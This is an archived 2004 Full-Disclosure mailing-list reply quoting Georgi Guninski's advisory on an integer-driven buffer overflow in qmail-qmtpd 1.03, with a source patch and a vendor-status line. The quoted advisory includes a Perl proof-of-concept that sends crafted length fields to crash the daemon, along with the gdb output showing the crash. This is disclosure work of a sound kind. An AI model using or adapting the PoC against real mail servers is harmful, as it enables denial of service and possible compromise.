lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040303163444.GB10251@wolff.to>
From: bruno at wolff.to (Bruno Wolff III)
Subject: Buffer overflow in qmail-qmtpd, yet still qmail  much  better  than  windows

On Wed, Mar 03, 2004 at 16:25:20 +0200,
  Georgi Guninski <guninski@...inski.com> wrote:
> Georgi Guninski security advisory #67, 2004
> 
> Buffer overflow in qmail-qmtpd, yet still qmail  much  better  than  windows
> 
> Systems affected:
> tested on qmail 1.03 on linux
> 
> Risk:  Low - not in default install and i can't	exploit it

RELAYCLIENT needs to be set by a trusted user in the first place, so if
you are getting bad values for RELAYCLIENT you have other problems.

> Date: 3 March 2004
> 
> Legal Notice:
> This Advisory is Copyright (c) 2004 Georgi Guninski.
> You may distribute it unmodified.
> You  may  not  modify	it   and   distribute	it   or   distribute   parts
> of it without the author's written permission - this especially  applies  to
> so called "vulnerabilities databases"  and  securityfocus,  microsoft,	cert
> and mitre.
> If   you   want    to	 link	 to    this    content	  use	 the	URL:
> http://www.guninski.com/qmail-qmtpd.html
> Anything in this document may change without notice.
> 
> Disclaimer:
> The  information  in  this  advisory  is  believed   to   be   true   though
> it may be false.
> The opinions  expressed  in  this  advisory  and  program  are	my  own  and
> not   of   any	 company.    The   usual   standard   disclaimer    applies,
> especially the fact that Georgi Guninski  is  not  liable  for	any  damages
> caused by direct  or  indirect	use  of  the  information  or  functionality
> provided  by  this  advisory  or  program.    Georgi   Guninski   bears   no
> responsibility for  content  or  misuse  of  this  advisory  or  program  or
> any derivatives thereof.
> 
> Description:
> 
> there is a buffer overflow in qmail-qmtpd.c if the env.   var.	 RELAYCLIENT
> is long between 4 and 1003.  A static buffer gets overflowed due to  integer
> overflow.  I can't exploit it on linux,  though  it  may  turn	exploitable.
> 
> Details:
> 
> Basically the idea is it is possible getlen() to  return  (unsigned  long)-1
> or -4 and then the check      
> if (len + relayclientlen >= 1000) 
> passes though len == (unsigned)-4.
> Then len is used to copy in a static buffer.
> The check for len  is  *before*  len  is  updated,  so	it  is	possible  to
> update len and then return len.
> A lot of memory gets overwritten including qq.	if a C	compiler  sets	ssin
> after buf, i believe it will be exploitable.
> The trick is that 
> len = 10 * len + (ch - '0');
> can return -1 if len == 0 and ch == '/'
> 
> How to reproduce:
> --------------------------------------------------
> [joro@...okote tmp]$ ./qma-qmtpd.pl
> qmail-qmtpd buffer overflow. Copyright Georgi Guninski
> Cannot be used in vulnerability databases and similar stuff
> 
> <in another terminal>
> ps awx
> 2080 pts/9    S      0:00 /var/qmail/bin/qmail-qmtpd
> gdb attach 2080
> cont
> <in first terminal hit enter>
> 
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804b096 in alarm ()
> --------------------------------------------------
> 
> -qma-qmtpd.pl----
> #!/usr/bin/perl -w
> 
> #Copyright Georgi Guninski\nCannot be used in vulnerability databases and 
> #similar stuff
> 
> use IO::Socket;
> use IO::Poll;
> 
> $ENV{"RELAYCLIENT"}="M\$UX";
> open(SOCK,"|/var/qmail/bin/qmail-qmtpd");
> 
> my $req;
> my $fromaddr="they\@m\$.weenies";
> my $touser="postmaster";
> 
> print "qmail-qmtpd buffer overflow. Copyright Georgi Guninski\nCannot be used in vulnerability databases and similar stuff\n";
> 
> $req  = "1:\n,";
> $req .= "1:V,";
> $req .= "/:"; #biglen - this is how we code '-1'
> $req .= ",:"; #len - this is how we code '-4'
> 
> 
> 
> print SOCK $req;
> my $ch=getc();
> 
> $req = "v" x 100000;
> 
> print SOCK $req;
> close SOCK;
> -----------------
> 
> Fix:
> 
> Patch by me, use at your own risk:
> 
> -patch-----
> --- ../qmail-1.03/qmail-qmtpd.c	1998-06-15 13:53:16.000000000 +0300
> +++ qmail-qmtpd.c	2004-02-29 16:15:13.000000000 +0200
> @@ -45,8 +45,8 @@
>    for (;;) {
>      substdio_get(&ssin,&ch,1);
>      if (ch == ':') return len;
> -    if (len > 200000000) resources();
>      len = 10 * len + (ch - '0');
> +    if (len > 200000000 || ch < '0' || ch > '9') resources();
>    }
>  }
>  
> @@ -193,8 +193,8 @@
>          substdio_get(&ssin,&ch,1);
>          --biglen;
>          if (ch == ':') break;
> -        if (len > 200000000) resources();
>          len = 10 * len + (ch - '0');
> +	if (len > 200000000 || ch < '0' || ch > '9') resources();
>        }
>        if (len >= biglen) badproto();
>        if (len + relayclientlen >= 1000) {
> 
> -----------
> 
> Vendor status:
> djb is aware of the bug
> 
> Georgi Guninski
> http://www.guninski.com
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists